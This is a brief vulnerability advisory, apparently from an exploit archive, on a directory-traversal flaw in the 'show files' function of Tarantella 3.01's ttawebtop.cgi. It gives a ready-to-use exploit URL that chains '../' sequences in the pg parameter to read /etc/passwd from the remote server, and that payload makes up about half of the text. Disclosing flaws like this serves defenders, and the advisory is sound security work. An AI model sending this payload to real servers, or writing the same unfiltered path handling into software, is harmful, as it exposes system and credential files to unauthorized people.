Name : tarantella 3.01 ttawebtop.cgi "show files" vulnerability
Problem : '..' and '/' are not filtered while processing
user input, so it is possible to enter arbitrary values
to retreive files from remote sever, which should not be
accessible normally.
Exploit:
http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=
../../../../../../../../../../../../../../../etc/passwd
Author : KF (dotslash@snosoft.com)